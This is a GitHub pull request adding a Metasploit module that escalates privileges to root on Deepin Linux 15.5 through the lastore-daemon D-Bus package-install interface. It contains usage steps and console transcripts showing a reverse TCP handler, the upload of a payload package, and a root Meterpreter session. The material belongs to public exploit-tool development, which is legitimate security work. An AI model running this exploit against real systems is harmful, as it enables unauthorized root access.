Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add lastore-daemon D-Bus Privilege Escalation exploit #9756

Merged
merged 2 commits into from Apr 20, 2018

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Mar 24, 2018

Add lastore-daemon D-Bus Privilege Escalation exploit.

        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/lastore_daemon_dbus_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

@bwatters-r7 bwatters-r7 self-assigned this Apr 20, 2018
@bwatters-r7 bwatters-r7 merged commit d5961f2 into rapid7:master Apr 20, 2018
3 checks passed
bwatters-r7 added a commit that referenced this issue Apr 20, 2018
Merge branch 'land-9756' into upstream-master
@bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Apr 20, 2018

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.135.158
[*] Meterpreter session 3 opened (192.168.135.111:4567 -> 192.168.135.158:41644) at 2018-04-20 15:33:09 -0500

meterpreter > sysinfo
Computer     : 192.168.135.158
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Building package...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/control' (110 bytes) ...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.VqngDqJ8fr' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 192.168.135.158
[*] Meterpreter session 4 opened (192.168.135.111:4444 -> 192.168.135.158:37688) at 2018-04-20 15:34:22 -0500
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/control
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst
[+] Deleted /tmp/.VqngDqJ8fr
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

@bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Apr 20, 2018

Release Notes

The exploits/linux/local/lastore_daemon_dbus_priv_esc module has been added to the framework. It abuses unauthenticated package installation through lastore-daemon D-Bus version 0.9.53-1 to gain root privileges on Deepin Linux 15.5 systems.

@bcoles
Copy link
Contributor Author

@bcoles bcoles commented Apr 20, 2018

Thanks

@bcoles bcoles deleted the lastore_daemon_dbus_priv_esc branch Apr 20, 2018
msjenkins-r7 pushed a commit that referenced this issue Apr 23, 2018
Merge branch 'land-9756' into upstream-master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants